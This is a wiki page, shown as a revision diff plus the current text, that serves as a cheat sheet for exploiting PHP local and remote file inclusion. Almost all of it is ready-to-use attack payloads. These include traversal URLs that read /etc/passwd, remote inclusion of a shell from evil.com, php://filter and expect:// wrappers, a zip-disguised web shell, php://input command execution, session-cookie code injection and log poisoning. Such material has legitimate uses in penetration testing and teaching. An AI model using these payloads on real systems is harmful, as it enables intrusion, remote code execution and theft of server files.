Difference between revisions of "Exploiting Local/Remove File Inclusion"

(LFI / RCE via Log file)
(LFI / RCE via input://)
Line 45: Line 45:
 
</syntaxhighlight>
 
</syntaxhighlight>
  
== LFI / RCE via input:// ==
+
== LFI / RCE via PHP Session ==
 +
Check if the website use PHP Session (PHPSESSID)
 +
 
 
<syntaxhighlight lang="bash">
 
<syntaxhighlight lang="bash">
http://example.com/index.php?page=php://input
+
Set-Cookie: PHPSESSID=i56kgbsq9rm8ndg3qbarhsbm27; path=/
DATA: <? system('whoami'); ?>
+
Set-Cookie: user=admin; expires=Mon, 13-April-2018 00:21:29 EDT; path=/; httponly
 +
</syntaxhighlight>
 +
 
 +
In PHP5 these sessions are stored into /var/lib/php5/sess_[PHPSESSID]
 +
 
 +
Inject your command into a cookie:
 +
<syntaxhighlight lang="bash">
 +
login=1&user=<?php system("cat /etc/passwd");?>&pass=password&lang=en_us.php
 +
</syntaxhighlight>
 +
 
 +
Include
 +
<syntaxhighlight lang="bash">
 +
file=/../../../../../../../../../var/lib/php5/sess_978a69sdf76987er6zdfa
 
</syntaxhighlight>
 
</syntaxhighlight>
  

Revision as of 15:24, 26 April 2018

What is LFI / RFI?

Local/Remove File Inclusion vulnerability allows an attacker to exploit a dynamic file inclusion mechanism of a web application to access files outside the intended spectre.

What is LFI / RFI?

Local/Remove File Inclusion vulnerability allows an attacker to exploit a dynamic file inclusion mechanism of a web application to access files outside the intended spectre.

LFI / RFI Cheat Sheet

http://example.com/index.php?page=../../../etc/passwd
http://example.com/index.php?page=../../../etc/passwd%00
http://example.com/index.php?page=%252e%252e%252fetc%252fpasswd
http://example.com/index.php?page=%252e%252e%252fetc%252fpasswd%00
http://example.com/index.php?page=../../../../../../../../../etc/passwd..\.\.\.\.\.\.\.\.\.\.\[ADD MORE]\.\.
http://example.com/index.php?page=../../../../[…]../../../../../etc/passwd
http://example.com/index.php?page=....//....//etc/passwd
http://example.com/index.php?page=..///////..////..//////etc/passwd
http://example.com/index.php?page=http://evil.com/shell.txt
http://example.com/index.php?page=http://evil.com/shell.txt%00
http://example.com/index.php?page=http:%252f%252fevil.com%252fshell.txt
http://example.com/index.php?page=php://filter/read=string.rot13/resource=index.php
http://example.com/index.php?page=php://filter/convert.base64-encode/resource=index.php
http://example.com/index.php?page=pHp://FilTer/convert.base64-encode/resource=index.php
http://example.com/index.php?page=php://filter/zlib.deflate/convert.base64-encode/resource=/etc/passwd
http://example.com/index.php?page=php:expect://id
http://example.com/index.php?page=php:expect://ls
http://example.com/index.php?page=path/to/uploaded/file.png
http://example.com/index.php?page=data:application/x-httpd-php;base64,PHN2ZyBvbmxvYWQ9YWxlcnQoMSk+

LFI Wrapper with ZIP

Crate a PHP payload (e.g.: system($_GET['cmd']), zip, masking your archive as a file with different, acceptable extension

zip payload.zip payload.php;   
mv payload.zip shell.jpg;    
rm payload.php

Execute

http://example.com/index.php?page=zip://shell.jpg%23payload.php

LFI / RCE via input://

http://example.com/index.php?page=php://input
DATA: <? system('whoami'); ?>

LFI / RCE via PHP Session

Check if the website use PHP Session (PHPSESSID)

Set-Cookie: PHPSESSID=i56kgbsq9rm8ndg3qbarhsbm27; path=/
Set-Cookie: user=admin; expires=Mon, 13-April-2018 00:21:29 EDT; path=/; httponly

In PHP5 these sessions are stored into /var/lib/php5/sess_[PHPSESSID]

Inject your command into a cookie:

login=1&user=<?php system("cat /etc/passwd");?>&pass=password&lang=en_us.php

Include

file=/../../../../../../../../../var/lib/php5/sess_978a69sdf76987er6zdfa

LFI / RCE via Log file

Append PHP to a log file

http://example.com/index.php?page=/var/log/apache/access.log
http://example.com/index.php?page=/var/log/apache/error.log
http://example.com/index.php?page=/var/log/vsftpd.log
http://example.com/index.php?page=/var/log/sshd.log

And include it

http://example.com/index.php?page=/var/log/apache/access.log